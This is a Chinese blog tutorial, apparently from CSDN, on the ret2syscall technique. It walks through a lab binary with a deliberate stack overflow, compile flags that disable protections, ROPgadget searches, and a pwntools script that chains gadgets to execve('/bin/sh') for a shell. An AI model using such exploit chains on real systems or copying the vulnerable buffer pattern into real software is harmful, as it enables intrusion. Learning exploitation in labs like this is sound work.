ret2syscall技术

最新推荐文章于 2023-07-14 10:45:53 发布
最新推荐文章于 2023-07-14 10:45:53 发布
阅读量569 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44119101/article/details/105149195
版权

ret2syscall技术的原理大致为:从一个程序的进程空间去找一些函数汇编指令序列,然后通过堆栈操作构造execve("/bin/sh",null.null)这个函数,从而在利用溢出漏洞的时候去执行这个函数来获取系统调用。

execve("/bin/sh",null.null)函数的汇编程序为:

pop eax,   # 系统调用号载入, execve为0xb

pop ebx,     # 第一个参数, /bin/sh的string

pop ecx,  # 第二个参数,0

pop edx, # 第三个参数,0

int 0x80,  # 执行系统调用

那么我们应该从程序的进程空间中去找一些push、ret这样的汇编指令序列,然后通过堆栈操作将eax的值赋为0xb,将ebx指向为/bin/sh的地址,ecx为0,edx也为0。

那么通过ROPgadget这个工具来获取这些指令的位置。
例如:

ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax"

这条指令的意思是从pop、ret序列当中寻找其中的eax

ROPgadget --binary ./7.exe --only "pop|ret" | grep "ebx" | grep "ecx" | grep "edx"

这个就是从pop、ret序列当中寻找其中的ebx、ecx、dex

ROPgadget --binary ./7.exe --string "/bin/sh"

这个是去找"/bin/sh"这个字符串的地址

ROPgadget --binary ./7.exe --only "int"|grep "0x80"

这个就是int中断找"0x80"

下面我们开始实验,这个是我们进行实验的1.c文件:

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/syscall.h>
void exploit()
{
    system("/bin/sh");
}
void func()
{
	char str[0x20];
	read(0,str,0x50);
}
int main()
{
	func();
	return 0;
}

首先我们将其编译,不使用堆栈保护

gcc -no-pie -fno-stack-protector  -static -m32  -o 1.exe 1.c

但是值得注意的是,我们需要设置成静态编译即
-static,否则将找不到这个程序的指令流。

找到这个程序的溢出位置,为第44个字节:
在这里插入图片描述
下面我们通过ROPgadget来寻找各个指令与函数的位置:

pop eax:
在这里插入图片描述

pop ebx 、edx、ecx:
在这里插入图片描述
参数"/bin/sh"的位置 以及断点int "0x80"的位置
在这里插入图片描述
根据execve的汇编指令,我们构造整个payload,其顺序为:

pop eax,载入execve(其值为0xb),pop ebx、ecx、edx,给三个寄存器分别传参,为:0x080ae008("/bin/sh"的地址)、0、0最后就是断点int "0x80"的位置
最后执行其python程序为1.py

from pwn import *
context(arch="i386",os="linux")
p=process('./7.exe')
offset = 44
add_eax=p32(0x080aaa06)
value_eax=p32(0xb)
add_edx_ecx_ebx=p32(0x0806f711)
value_ebx=p32(0x080ae008)
value_ecx=p32(0)
value_edx=p32(0)
add_int=p32(0x0804a3d2)
payload =offset*'\x90'+add_eax+value_eax+add_edx_ecx_ebx+value_edx+value_ecx+value_ebx+add_int
p.sendline(payload)
p.interactive()

获取权限成功
在这里插入图片描述

菜鸡CaiH
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 1446
虽然网上(包括CSDN)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
ret2syscall(pwn第二课)
最新发布
s5555555___的博客
02-20 1199
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
ret2syscall-执行系统调用
yuqie的博客
07-14 184
checksec一下:32位程序,没有canary、PIE,开了NX,放入IDA看一下:有gets,可以溢出,不过没有system函数,也不能执行shellcode,查看字符发现有/bin/sh,那就是新学的系统调用。 假设程序中存在下面的代码: 但是程序中并没有这串代码,所以需要使用ROP(返回导向编程)构造,构造方式如下图:简单来说就是需要找到一些零零散散的gadget,然后组装成payload,不过前提是先溢出劫持控制器,这里IDA里给出v4的大小的'0x64',要溢出的话需要'0x68'也就是
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1157
PWN
缓冲区溢出-CTF-PWN
04-28
<img src="https://img-bss.csdn.net/202004281305056475.jpg" alt="" />
pwn07.ret2syscall例题
11-11
ret2syscall例题
linux syscall详细介绍.docx
11-08
5. 执行完毕后,通过`ret_fast_syscall`指令返回用户态,继续执行`kill()`函数后续的代码。 系统调用不仅提供了安全的内核访问途径,还经过优化以保证性能。在Linux中,上下文切换时间短,系统调用处理流程精简,...
攻防世界pwn题:Recho.doc
07-13
在尝试ROP技术时,发现无法使用ret2libc3泄露libc的版本,因为机器一般都启用了ASLR保护机制,libc的加载位置会在重新执行后发生改变。因此,需要一次性完成所有操作,也就是get shell或cat flag。 4. 系统调用 在...
Linux内核设计与实现.pdf
09-30
答:看这一句:pid =fork() 当执行这一句时,当前进程进入fork()运行,此时,fork()内会用一段嵌入式汇编进行系统调用:int 0x80(具体代码可参见内核版本0.11 的 unistd.h文件的 133 行_syscall0函数)。...
32位汇编语言程序设计罗云彬第2版光盘
05-20
2. **指令集**:32位汇编语言包括一系列指令,如数据处理(如ADD、SUB、MUL)、逻辑运算(如AND、OR、NOT)、控制流程(如JMP、CALL、RET)、输入输出操作等。理解这些指令的含义和用法是编程的基础。 3. **寻址...
linux_pwn(5)--ret2syscall x64&&[极客大挑战 2019]Not Bad
m0_67266787的博客
03-15 1155
文章目录 What is ret2syscall pwn题思路 例题 保护机制 写payload 打开flag 读取flag 写到输出中 生成shellcode 开始做题 调用read(0,mem,0x1000)把我们真正的shellcode写道mem 调试是否可以往mem写shellcode 往mem填写读取flag的shellcode 总结 What is ret2syscall ret2syscall是栈溢出里常见的一种手法,如果在x86下有int 80或者在x64中看到s
ret2syscall原理详解
Sakura给爷pwn全场
10-27 317
ret2syscall原理详解与实例分析: https://www.freebuf.com/articles/system/234228.html
ret2syscall
EternalBurning的博客
11-10 463
ret2syscallchecksec查找溢出点计算偏移量1 手动计算2 脚本systemcall1 自动化脚本2 手动构造 checksec 查找溢出点 计算偏移量 1 手动计算 0x8048e8f和0x8048e93这两行明显是为调用函数准备参数,把参数的地址给压栈。这个地址就是gets函数写入地址的起始地址,也就是eax,此时距基址的距离是EBP-EAX,由于是32位,所以返回地址在E...
ret2syscall前置知识
Rt1Text的博客
02-10 2773
1.目的 是拿到shell 2.具体操作 控制程序执行系统调用(字面理解就可) 3.系统调用是什么? 系统调用:system call 按照搜索的定义可理解为一种服务:程序运行在用户空间向操作系统内核(内核空间)请求更高权限运行 用户空间和内核空间可参考以下百度 用户空间_百度百科 (baidu.com) 系统调用提供用户程序与操作系统间的接口(大多数系统交互式操作系统需要在内核态执行) 系统调用就运行在内核空间 4.具体怎么做 linux在x86系统 触发int 0x80 ,借助
pwn基础之ctfwiki-栈溢出-基础ROP-ret2syscall
qq_52658640的博客
04-22 1385
文章目录前言原理系统调用ret2system挖掘漏洞2.读入数据总结 前言 二进制小白的学习笔记,如有错误请大佬及时斧正。 原理 ret2syscall,即控制程序执行系统调用,获取 shell。 系统调用 Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是: 应用程序调用库函数(API); API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态; 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用); 系统调用完成相应
ROPgadgets与ret2syscall技术原理
qq_44119514的博客
04-01 145
Linux系统调用(syscall)原理(转)
weixin_34245169的博客
03-13 1591
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-ar...
ROPgadget题型——ret2syscall
qq_41560595的博客
10-09 620
解题思路 这道题本来考虑使用libc来解,但发现不是动态链接形成的文件。 于是,考虑如下系统调用获取shell: execve("/bin/sh",NULL,NULL) 在32位程序中,参数一般是放在栈中的,但系统调用例外,参数是放在通用寄存器中的。即eax,ebx,ecx,edx。 eax:存放系统调用号,0xb ebx:存放第一个参数/bin/sh地址 ecx:存放第二个参数0 edx:存放第三个参数0 下面就是想办法把几个参数和调用号“弹到”寄存器上: 找到pop edx;pop ecx;pop e
构造syscall调用execve的rop
05-28
ROP(Return-oriented Programming)是一种攻击技术,它利用程序的已有代码(即gadget)来构造攻击。在构造syscall调用execve的ROP时,我们需要找到一些适合我们需要的gadget,以及一个能够满足我们需求的内存区域来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值